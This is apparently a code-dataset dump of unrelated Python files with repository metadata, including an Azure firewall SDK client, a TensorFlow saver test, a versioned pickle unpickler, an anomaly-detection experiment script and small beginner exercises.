_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
azure_firewall_name: str,
parameters: "models.AzureFirewall",
**kwargs
) -> "models.AzureFirewall":
"""Creates or updates the specified Azure Firewall.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param azure_firewall_name: The name of the Azure Firewall.
:type azure_firewall_name: str
:param parameters: Parameters supplied to the create or update Azure Firewall operation.
:type parameters: ~azure.mgmt.network.v2019_04_01.models.AzureFirewall
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: AzureFirewall, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_04_01.models.AzureFirewall
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewall"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
azure_firewall_name=azure_firewall_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('AzureFirewall', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls/{azureFirewallName}'} # type: ignore
def list(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["models.AzureFirewallListResult"]:
"""Lists all Azure Firewalls in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AzureFirewallListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_04_01.models.AzureFirewallListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewallListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('AzureFirewallListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/azureFirewalls'} # type: ignore
def list_all(
self,
**kwargs
) -> AsyncIterable["models.AzureFirewallListResult"]:
"""Gets all the Azure Firewalls in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either AzureFirewallListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_04_01.models.AzureFirewallListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.AzureFirewallListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-04-01"
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('AzureFirewallListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/azureFirewalls'} # type: ignore
| [
"[email protected]"
] | |
cecfbc03e21c8156c775e484b68292ec8c14c60f | 4dc4345cca9c5f452bf4b87263505ee6b4e960af | /data_types_and_variables/contact_names.py | 2e5c1b630d63078c6ee3b04f570a368583e63c4b | [] | no_license | ivan-yosifov88/python_fundamentals | 88c7eb5167bbe6692b95051d1551496a84893524 | 1cfe6d18453362fc26be984f6cb871b9d7dec63d | refs/heads/master | 2023-03-29T16:46:55.363035 | 2021-04-07T10:39:44 | 2021-04-07T10:39:44 | 341,604,297 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | first_name = input()
last_name = input()
delimiter = input()
print(f"{first_name}{delimiter}{last_name}") | [
"ivan.yosifov88gmail.com"
] | ivan.yosifov88gmail.com |
d0ec0a41b10c508f07c1ac2e6b2c38ba42f77c1e | 6e58f95a931db523a3957134ff8cac670d4c20be | /Hunter level/given 2 string checking whether they are same without using built in function.py | 0b85adde15d8c4f9f377c2739745e69844479191 | [] | no_license | ramyasutraye/python-programming-13 | 36235f324152d793ca1b2bf087d2a49a62d47787 | ea58462208bb4da826b9f1917bdad17c80d055dc | refs/heads/master | 2020-04-23T19:30:53.189933 | 2018-05-02T17:13:30 | 2018-05-02T17:13:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | a=str(input())
b=str(input())
l1=len(a)
l2=len(b)
if(l1==l2):
    # flag must start at 1 and drop to 0 on the first mismatch; the original
    # kept only the result of the last comparison (and crashed on empty input).
    flag=1
    for i in range (l1):
        if a[i]!=b[i]:
            flag=0
            break
    if (flag==1):
        print ("yes")
    else:
        print ("no")
else:
    print ("no")
| [
"[email protected]"
] | |
9cd8a6e55a4e5085df6657d0a04781d0dee9ed7b | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/python/training/saver_large_variable_test.py | f19600a79e7b85bc841cc500c0681bd62a3cd3a6 | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 2,386 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Tests for tensorflow.python.training.saver.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import saver
class SaverLargeVariableTest(test.TestCase):
# NOTE: This is in a separate file from saver_test.py because the
# large allocations do not play well with TSAN, and cause flaky
# failures.
def testLargeVariable(self):
save_path = os.path.join(self.get_temp_dir(), "large_variable")
with session.Session("", graph=ops.Graph()) as sess:
# Declare a variable that is exactly 2GB. This should fail,
# because a serialized checkpoint includes other header
# metadata.
with ops.device("/cpu:0"):
var = variables.Variable(
constant_op.constant(
False, shape=[2, 1024, 1024, 1024], dtype=dtypes.bool))
save = saver.Saver(
{
var.op.name: var
}, write_version=saver_pb2.SaverDef.V1)
var.initializer.run()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Tensor slice is too large to serialize"):
save.save(sess, save_path)
if __name__ == "__main__":
test.main()
| [
"[email protected]"
] | |
3d6963aee849bab68187c59aa775a10ae4a266f5 | 84b5ac79cb471cad1d54ed1d2c842dc5581a03f0 | /branches/pylint/config/scripts/paella-export-profile | 777b1b8eccf1dd0bbd7a397eb1c75fd8f43c9ebf | [] | no_license | BackupTheBerlios/paella-svn | c8fb5ea3ae2a5e4ca6325a0b3623d80368b767f3 | d737a5ea4b40f279a1b2742c62bc34bd7df68348 | refs/heads/master | 2021-01-18T14:07:40.881696 | 2012-11-13T20:33:08 | 2012-11-13T20:33:08 | 40,747,253 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 377 | #!/usr/bin/env python
import os, sys
from paella.db import PaellaConnection
from paella.db.profile.xmlgen import PaellaProfiles
conn = PaellaConnection()
args = sys.argv[1:]
profile = args[0]
profiles = PaellaProfiles(conn)
tfile = file(profile + '.xml', 'w')
xml = profiles.export_profile(profile)
xml.writexml(tfile, indent='\t', newl='\n', addindent='\t')
tfile.close()
| [
"umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f"
] | umeboshi@cfc4e7be-4be4-0310-bcfe-fc894edce94f |
|
bbbfb496488a02ad49a1820a1d8e385052809eb7 | 3950cb348a4a3ff6627d502dbdf4e576575df2fb | /.venv/Lib/site-packages/apptools/persistence/versioned_unpickler.py | 25338c9278da68d60cad7b6d117da78e73aaacdc | [] | no_license | Bdye15/Sample_Programs | a90d288c8f5434f46e1d266f005d01159d8f7927 | 08218b697db91e55e8e0c49664a0b0cb44b4ab93 | refs/heads/main | 2023-03-02T04:40:57.737097 | 2021-01-31T03:03:59 | 2021-01-31T03:03:59 | 328,053,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,883 | py | # (C) Copyright 2005-2020 Enthought, Inc., Austin, TX
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only under
# the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
#
# Thanks for using Enthought open source!
# Standard library imports
from pickle import _Unpickler as Unpickler
from pickle import UnpicklingError, BUILD
import logging
from types import GeneratorType
# Enthought library imports
from apptools.persistence.updater import __replacement_setstate__
logger = logging.getLogger(__name__)
##############################################################################
# class 'NewUnpickler'
##############################################################################
class NewUnpickler(Unpickler):
"""An unpickler that implements a two-stage pickling process to make it
possible to unpickle complicated Python object hierarchies where the
unserialized state of an object depends on the state of other objects in
the same pickle.
"""
def load(self, max_pass=-1):
"""Read a pickled object representation from the open file.
Return the reconstituted object hierarchy specified in the file.
"""
# List of objects to be unpickled.
self.objects = []
# We overload the load_build method.
dispatch = self.dispatch
dispatch[BUILD[0]] = NewUnpickler.load_build
# call the super class' method.
ret = Unpickler.load(self)
self.initialize(max_pass)
self.objects = []
# Reset the Unpickler's dispatch table.
dispatch[BUILD[0]] = Unpickler.load_build
return ret
def initialize(self, max_pass):
# List of (object, generator) tuples that initialize objects.
generators = []
# Execute object's initialize to setup the generators.
for obj in self.objects:
if hasattr(obj, "__initialize__") and callable(obj.__initialize__):
ret = obj.__initialize__()
if isinstance(ret, GeneratorType):
generators.append((obj, ret))
elif ret is not None:
raise UnpicklingError(
"Unexpected return value from "
"__initialize__. %s returned %s" % (obj, ret)
)
# Ensure a maximum number of passes
if max_pass < 0:
max_pass = len(generators)
# Now run the generators.
count = 0
while len(generators) > 0:
count += 1
if count > max_pass:
not_done = [x[0] for x in generators]
msg = """Reached maximum pass count %s. You may have
a deadlock! The following objects are
uninitialized: %s""" % (
max_pass,
not_done,
)
raise UnpicklingError(msg)
for o, g in generators[:]:
try:
next(g)
except StopIteration:
generators.remove((o, g))
# Make this a class method since dispatch is a class variable.
# Otherwise, supposing the initial VersionedUnpickler.load call (which
# would have overloaded the load_build method) makes a pickle.load call at
# some point, we would have the dispatch still pointing to
# NewPickler.load_build whereas the object being passed in will be an
# Unpickler instance, causing a TypeError.
def load_build(cls, obj):
# Just save the instance in the list of objects.
if isinstance(obj, NewUnpickler):
obj.objects.append(obj.stack[-2])
Unpickler.load_build(obj)
load_build = classmethod(load_build)
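
# A minimal sketch of the two-stage protocol NewUnpickler drives (illustrative
# only -- the class name Node and its attributes are assumptions, not part of
# this module):
#
#     class Node(object):
#         def __initialize__(self):
#             # Yield until another object's BUILD has filled in self.peer.
#             while self.peer is None:
#                 yield
#             self.resolved = self.peer.name
#
# Each yield hands control back to NewUnpickler.initialize(), which makes
# another pass over the outstanding generators (bounded by max_pass).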
class VersionedUnpickler(NewUnpickler):
"""This class reads in a pickled file created at revision version 'n'
and then applies the transforms specified in the updater class to
generate a new set of objects which are at revision version 'n+1'.
I decided to keep the loading of the updater out of this generic class
because we will want updaters to be generated for each plugin's type
of project.
This ensures that the VersionedUnpickler can remain ignorant about the
actual version numbers - all it needs to do is upgrade one release.
"""
def __init__(self, file, updater=None):
Unpickler.__init__(self, file)
self.updater = updater
def find_class(self, module, name):
"""Overridden method from Unpickler.
NB __setstate__ is not called until later.
"""
if self.updater:
# check to see if this class needs to be mapped to a new class
# or module name
original_module, original_name = module, name
module, name = self.updater.get_latest(module, name)
# load the class...
klass = self.import_name(module, name)
# add the updater.... TODO - why the old name?
self.add_updater(original_module, original_name, klass)
else:
# there is no updater so we will be reading in an up to date
# version of the file...
try:
klass = Unpickler.find_class(self, module, name)
except Exception:
logger.error("Looking for [%s] [%s]" % (module, name))
logger.exception(
"Problem using default unpickle functionality"
)
# restore the original __setstate__ if necessary
fn = getattr(klass, "__setstate_original__", False)
if fn:
setattr(klass, "__setstate__", fn)
return klass
def add_updater(self, module, name, klass):
"""If there is an updater defined for this class we will add it to the
class as the __setstate__ method.
"""
fn = self.updater.setstates.get((module, name), False)
if fn:
# move the existing __setstate__ out of the way
self.backup_setstate(module, klass)
# add the updater into the class
setattr(klass, "__updater__", fn)
# hook up our __setstate__ which updates self.__dict__
setattr(klass, "__setstate__", __replacement_setstate__)
else:
pass
def backup_setstate(self, module, klass):
"""If the class has a user defined __setstate__ we back it up."""
if getattr(klass, "__setstate__", False):
if getattr(klass, "__setstate_original__", False):
# don't overwrite the original __setstate__
name = "__setstate__%s" % self.updater.__class__
else:
# backup the original __setstate__ which we will restore
# and run later when we have finished updating the class
name = "__setstate_original__"
method = getattr(klass, "__setstate__")
setattr(klass, name, method)
else:
# the class has no __setstate__ method so do nothing
pass
def import_name(self, module, name):
"""
If the class is needed for the latest version of the application then
it should presumably exist.
If the class no longer exists then we should perhaps return
a proxy of the class.
        If the persisted file is at, say, v1 and the application is at v3, then
        objects that are required for v1 and v2 do not have to exist; they only
        need to be placeholders for the state during an upgrade.
"""
module = __import__(module, globals(), locals(), [name])
return vars(module)[name]
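# A minimal usage sketch, assuming `my_updater` exposes the interface used
# above (`get_latest(module, name)` and a `setstates` mapping); the names
# here are illustrative only:
#
#     with open('project.pickle', 'rb') as f:
#         objects = VersionedUnpickler(f, updater=my_updater).load()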
| [
"[email protected]"
] | |
c3d059c6a856c09a0127d8793a81b5c97ef00863 | a3ff8c37e8079412477e203faa2f9526ffb66b7a | /realworld_expt/expt.py | 9d07e0d72ad6f148d9a7608d719a22062f2252cf | [] | no_license | greentfrapp/temp | 07c83aaf08dd236f6305af877280698612129681 | 406864f3c7c2f78c23df2c29b640ba9ea622eb27 | refs/heads/master | 2020-03-29T19:24:48.466126 | 2019-01-30T15:14:10 | 2019-01-30T15:14:10 | 150,261,784 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,493 | py | from __future__ import print_function
try:
raw_input
except:
raw_input = input
import numpy as np
from keras.models import load_model
import json
import tensorflow as tf
from sklearn.ensemble import IsolationForest
import matplotlib.pyplot as plt
from scipy.stats import chi
from absl import flags
from absl import app
from utils import MammoData as Data
FLAGS = flags.FLAGS
flags.DEFINE_bool("plot", False, "Plot")
flags.DEFINE_bool("train", False, "Train")
flags.DEFINE_integer("std", 10, "std")
flags.DEFINE_integer("iter", 5, "No. of iForest runs per sample set")
flags.DEFINE_integer("samples", 5, "No. of sample sets generated")
def cal_auc(x, y):
return np.trapz(y, x)
def get_dist(values):
center = np.mean(values, axis=0)
std = np.std(values, axis=0)
chi_std = chi.std(2, 0, np.linalg.norm(std))
dist = np.linalg.norm(values - center, axis=1)
for i, el in enumerate(dist):
if el > 2.7 * chi_std:
dist[i] = 0.
elif el < 2.3 * chi_std:
dist[i] = 0.
# dist = np.exp(dist)
dist /= np.sum(dist)
return dist
def roc_val(classifier, x_test, y_test):
predictions = classifier.predict(x_test)
predicted_anomalies = (predictions == -1).astype(np.int32)
tp = np.sum(predicted_anomalies[np.where(y_test == predicted_anomalies)] == 1)
tn = np.sum(predicted_anomalies[np.where(y_test == predicted_anomalies)] == 0)
fp = np.sum(predicted_anomalies) - tp
fn = np.sum(predicted_anomalies == 0) - tn
if tp == 0:
recall = tp_rate = 0.
precision = 1.
else:
recall = tp_rate = tp / (tp + fn)
precision = tp / (tp + fp)
if recall + precision == 0:
f1 = 0.
else:
f1 = (2 * recall * precision) / (recall + precision)
fp_rate = fp / (fp + tn)
return {"TPR": tp_rate, "FPR": fp_rate, "F1": f1}
def generate(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x = x_train
y = y_train
latent = encoder.predict(x)
center = np.mean(latent, axis=0)
latent = np.random.randn(synth_size, 2)
for i, vector in enumerate(latent):
latent[i] = 10. * vector / np.linalg.norm(vector)
latent += center
samples = decoder.predict(latent.reshape(-1, 2))
with open(folder + "synthetic_samples_{}.json".format(FLAGS.std, n_run), 'w') as file:
json.dump(samples.tolist(), file)
return samples
def smote(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x = x_train
y = y_train
samples = []
for i in np.arange(synth_size):
choice = np.random.choice(np.arange(len(x)))
a = x[choice]
x_copy = np.concatenate((x[:choice], x[choice + 1:]))
x_copy -= a
x_copy = np.linalg.norm(x_copy, axis=1)
b = np.argmin(x_copy)
if b >= choice:
b += 1
b = x[b]
scale = np.random.rand()
c = scale * (a-b) + b
samples.append(list(c))
with open(folder + "smote_reg_data_samples_{}.json".format(FLAGS.std, n_run), 'w') as file:
json.dump(samples, file)
return samples
def expt(n_run):
(x_train, y_train), (x_test, y_test) = dataset.load_data()
x_synth = {
"doping": generate(n_run),
"smote": smote(n_run),
}
x = {
"original": x_train,
}
for synth_type in x_synth:
x[synth_type] = np.concatenate((x_train, x_synth[synth_type]))
stat_types = ["TPR", "FPR", "F1"]
stats = {}
for method in x:
stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
con_vals = np.arange(0.01, 0.3, 0.02)
con_vals = np.concatenate(([0.001, 0.003, 0.005, 0.007], con_vals))
for i, con_val in enumerate(con_vals):
print("Run #{}/{}".format(i + 1, len(con_vals)))
run_stats = {}
for method in x:
run_stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
for j in np.arange(FLAGS.iter):
classifiers = {}
for method in x:
classifiers[method] = IsolationForest(contamination=con_val)
classifiers[method].fit(x[method])
results = roc_val(classifiers[method], x_test, y_test)
for stat in results:
run_stats[method][stat].append(results[stat])
for method in stats:
for stat in stat_types:
stats[method][stat].append(np.mean(run_stats[method][stat]))
return stats
def train():
methods = ["original", "doping", "smote"]
stat_types = ["TPR", "FPR", "F1"]
all_stats = {}
for method in methods:
all_stats[method] = dict(zip(stat_types, [[] for stat in stat_types]))
for i in np.arange(FLAGS.samples):
expt_stats = expt(i)
for method in methods:
for stat in stat_types:
all_stats[method][stat].append(expt_stats[method][stat])
for method in methods:
for stat in stat_types:
all_stats[method][stat] = np.mean(all_stats[method][stat], axis=0).tolist()
with open(folder + "stats.json".format(FLAGS.std), 'w') as file:
json.dump(all_stats, file)
def plot(all_stats, methods=None):
f1_list = []
auc_list = []
g_list = []
    if methods is None:
methods = all_stats.keys()
for method in methods:
# print("\n" + method)
f1 = np.max(all_stats[method]["F1"])
auc = cal_auc(np.concatenate(([0.0], all_stats[method]["FPR"], [1.0])), np.concatenate(([0.0], all_stats[method]["TPR"], [1.0])))
# print("F1[{}]\t{}".format(np.argmax(all_stats[method]["F1"]), np.max(all_stats[method]["F1"])))
# print("AUC\t{}".format(cal_auc(np.concatenate(([0.0], all_stats[method]["FPR"], [1.0])), np.concatenate(([0.0], all_stats[method]["TPR"], [1.0])))))
f1_list.append([f1, method])
auc_list.append([auc, method])
r = all_stats[method]["TPR"][np.argmax(all_stats[method]["F1"])]
p = f1 * r / (2 * r - f1)
g = (r * p) ** 0.5
# print(2 * p * r / (p + r))
# print(p, r, f1)
g_list.append([g, method])
f1_list.sort(reverse=True)
auc_list.sort(reverse=True)
g_list.sort(reverse=True)
print("\nF1:")
for [f1, method] in f1_list:
print("{}: {}".format(method, f1))
print("\nAUC:")
for [auc, method] in auc_list:
print("{}: {}".format(method, auc))
print("\nG:")
for [g, method] in g_list:
print("{}: {}".format(method, g))
def main(unused_argv):
global desc, folder, synth_size, encoder, decoder, dataset
desc = "aae"
folder = "./expt_std{}_temp2/".format(FLAGS.std)
folder = "./"
tf.gfile.MakeDirs(folder)
synth_size = 1100
encoder = load_model('{}_encoder_{}_test.h5'.format(desc, FLAGS.std))
decoder = load_model('{}_decoder_{}_test.h5'.format(desc, FLAGS.std))
dataset = Data()
if FLAGS.train:
train()
elif FLAGS.plot:
methods = ["original", "doping", "smote"]
stat_types = ["TPR", "FPR", "F1"]
with open(folder + "stats.json".format(FLAGS.std), 'r') as file:
all_stats = json.load(file)
plot(all_stats, methods)
if __name__ == "__main__":
app.run(main)
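# Typical invocations, based on the flags defined above (the .h5 encoder and
# decoder files are assumed to be present in the working directory):
#
#     python expt.py --train --std=10 --iter=5 --samples=5
#     python expt.py --plot --std=10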
| [
"[email protected]"
] | |
012bdc029e1fff6ec79f8cfc06baae7b9eb69a44 | ffa8b19913d891a655ff78384847ea9fdc5b0bc9 | /test/test_group_id_for_group_user_inclusion.py | 9c9b9f0104942ca2565e0a4e5b474fdf91deaf59 | [] | no_license | ccalipSR/python_sdk2 | b76124f409e26128ff291d2c33612883929c1b5f | d8979ed7434f4ffbc62fc30c90d40d93a327b7d1 | refs/heads/master | 2020-04-09T17:13:43.581633 | 2018-12-05T06:53:50 | 2018-12-05T06:53:50 | 160,473,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,613 | py | # coding: utf-8
"""
Looker API 3.0 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning. Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning) # noqa: E501
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.group_id_for_group_user_inclusion import GroupIdForGroupUserInclusion # noqa: E501
from swagger_client.rest import ApiException
class TestGroupIdForGroupUserInclusion(unittest.TestCase):
"""GroupIdForGroupUserInclusion unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGroupIdForGroupUserInclusion(self):
"""Test GroupIdForGroupUserInclusion"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.group_id_for_group_user_inclusion.GroupIdForGroupUserInclusion() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
dec281751603425b8397dc65a0ebbd7b8b50ff7f | a564b8277e33eb27009089ec2e216a4d266a8861 | /官方配套代码/15/15.3/Senior/server/CrazyitDict.py | 6fc2e469e9af559f3323a86b8dde9a2555759584 | [
"Unlicense"
] | permissive | yifengyou/crazy-python | 3cb50f462e4ddb921c365e2f0cb3e846e6539383 | 28099bd5011de6981a7c5412783952cc7601ae0c | refs/heads/main | 2023-06-18T18:10:52.691245 | 2021-07-18T14:21:03 | 2021-07-18T14:21:03 | 387,088,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,708 | py | # coding: utf-8
#########################################################################
#   Website: <a href="http://www.crazyit.org">Crazy Java Alliance</a>   #
#   author yeeku.H.lee [email protected]                              #
#                                                                       #
#   version 1.0                                                         #
#                                                                       #
#   Copyright (C), 2001-2018, yeeku.H.Lee                               #
#                                                                       #
#   This program is protected by copyright laws.                        #
#                                                                       #
#   Program Name:                                                       #
#                                                                       #
#   <br>Date:                                                           #
#########################################################################
class CrazyitDict(dict):
    # Look up a key by its value.
    def key_from_value(self, val):
        # Iterate over the collection of all keys.
        for key in self.keys():
            # If this key's value matches the value being searched for,
            # return the corresponding key.
            if self[key] == val:
                return key
        return None
    # Remove a key by its value.
    def remove_by_value(self, val):
        # Iterate over the collection of all keys.
        for key in self.keys():
            # If this key's value matches the value being searched for,
            # remove that key and stop.
            if self[key] == val:
                self.pop(key)
                return
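# A minimal usage sketch of the two helpers above; values are illustrative:
#
#     d = CrazyitDict(one=1, two=2, three=2)
#     d.key_from_value(1)    # -> 'one'
#     d.remove_by_value(2)   # removes the first key found whose value is 2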
| [
"[email protected]"
] | |
9e04759332a82f222f84a256886b4bd3e5300456 | e42478c0c501a11280a3b0b3266a931215fd5a34 | /fxdayu_data/handler/base.py | 3e03b7fc7e8eeb0830d6ff42ded200f68ffccb42 | [] | no_license | limingbei/fxdayu_data | d36af819ee32e32e541eaf205b0e1c9309ffc89a | 2d1541def42b31e839e1027a85cfd08665f731a3 | refs/heads/master | 2020-03-17T23:16:37.656128 | 2018-01-05T05:50:41 | 2018-01-05T05:50:41 | 134,038,018 | 1 | 0 | null | 2018-05-19T06:55:59 | 2018-05-19T06:55:59 | null | UTF-8 | Python | false | false | 475 | py | # encoding:utf-8
from datetime import datetime
from pymongo.mongo_client import database
import pandas as pd
import pymongo
class DataHandler(object):
def write(self, *args, **kwargs):
pass
def read(self, *args, **kwargs):
pass
def inplace(self, *args, **kwargs):
pass
def update(self, *args, **kwargs):
pass
def delete(self, *args, **kwargs):
pass
def table_names(self, *args, **kwargs):
pass
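# A minimal sketch of a concrete handler built on the hooks above; the
# collection layout and pymongo calls here are assumptions, not part of
# this module:
#
#     class MongoHandler(DataHandler):
#         def __init__(self, db):
#             self.db = db  # a pymongo database object
#
#         def read(self, name):
#             return pd.DataFrame(list(self.db[name].find({}, {'_id': 0})))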
| [
"[email protected]"
] | |
